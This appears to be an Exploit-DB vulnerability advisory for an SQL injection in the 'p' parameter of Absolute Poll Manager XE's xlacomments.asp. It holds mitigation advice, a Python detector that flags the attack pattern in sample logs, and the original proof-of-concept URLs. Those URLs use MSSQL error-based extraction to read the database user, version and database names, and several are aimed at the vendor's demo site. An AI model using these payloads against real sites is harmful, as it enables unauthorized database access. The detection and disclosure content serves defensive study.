Vendor: Absolute Poll Manager XE
By: Hakxer
CVSS: 7.5 (HIGH)
CWE: SQL Injection
Product Name: Absolute Poll Manager XE
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2008

Absolute Poll Manager XE SQL Injection

The Absolute Poll Manager XE script is vulnerable to SQL injection. The 'p' parameter of the xlacomments.asp file is passed to a database query without adequate validation, so an attacker can inject SQL through it; the proof of concept below uses MSSQL error-based extraction (convert(int, (select ...))) to read the database user, server version and database names from the resulting error. This can lead to unauthorized access, data manipulation, and other malicious activities.

Mitigation:

The vendor should release a patch to fix the SQL injection vulnerability. In the meantime, users are advised to sanitize user input and use prepared statements or parameterized queries to prevent SQL injection attacks.
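As an added example that is not part of the advisory, the following detection logic scans web-server access logs for requests to xlacomments.asp whose 'p' parameter is not a plain integer, and specifically flags the CONVERT/CAST-to-int-of-a-subselect pattern used by the proof of concept. The log lines are constructed here; the assumption that 'p' is meant to carry an integer poll id is ours, not stated by the vendor.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not taken from the
# advisory: two benign requests followed by two that mirror the PoC pattern.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Oct/2008:10:00:01 +0000] "GET /absolutepm/xlaabsolutepm/xlacomments.asp?p=12 HTTP/1.1" 200 2310
10.0.0.6 - - [11/Oct/2008:10:00:02 +0000] "GET /absolutepm/xlaabsolutepm/xlacomments.asp?p=7&page=2 HTTP/1.1" 200 1980
10.0.0.9 - - [11/Oct/2008:10:00:03 +0000] "GET /absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+@@version)) HTTP/1.1" 500 512
10.0.0.9 - - [11/Oct/2008:10:00:04 +0000] "GET /absolutepm/xlaabsolutepm/xlacomments.asp?p=convert%28int%2C%28select+db_name%281%29%29%29 HTTP/1.1" 500 512
"""

# Pulls the request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# MSSQL error-based extraction: CONVERT/CAST applied to a subselect.
CONVERT_RE = re.compile(r"\b(convert|cast)\s*\(.*\bselect\b", re.IGNORECASE)


def classify_p(value):
    """Return a reason string if the decoded 'p' value is suspicious, else None.

    Assumption: xlacomments.asp expects an integer poll id in 'p', so anything
    that is not all digits is anomalous; the CONVERT/CAST shape gets its own tag.
    """
    if re.fullmatch(r"\d+", value):
        return None
    if CONVERT_RE.search(value):
        return "mssql-convert-subselect"
    return "non-integer-id"


def scan(log_text):
    """Return (client_ip, reason, decoded_p) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.lower().endswith("/xlacomments.asp"):
            continue
        # parse_qs percent-decodes and turns '+' into spaces for us.
        for value in parse_qs(parts.query, keep_blank_values=True).get("p", []):
            reason = classify_p(value)
            if reason:
                findings.append((line.split()[0], reason, value))
    return findings


if __name__ == "__main__":
    for ip, reason, p in scan(SAMPLE_LOG):
        print(f"{ip} {reason} p={p!r}")
```

The 500 status on the flagged lines is the other signal worth correlating: error-based extraction depends on the database error reaching the response, so suppressing detailed errors and validating 'p' as an integer both remove the channel.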

Exploit-DB raw data:

###############################################################################################
# Author : Hakxer
# Home : Www.educ-up.com
# Type Gap : Sql injection --((MSSQL Injection))--
# script : Absolute Poll Manager XE  [see script] http://www.xigla.com/absolutepm/demo.htm
# Greetz : Allah , Egyptian x Hacker , Soufiane , Sinaritx , SQL_inj4ct0r , Stealth , Kof2002 
# TM : EgY Coders 
#################################################################################################

### POC 
www.site.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+user))

### Exploit : 

http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+@@version))

http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+user))

http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+db_name(1)))

http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+db_name(2)))

http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+db_name(3)))

###############################################################################

-------------------------------- The End of Gap -----------------------------------

# milw0rm.com [2008-10-11]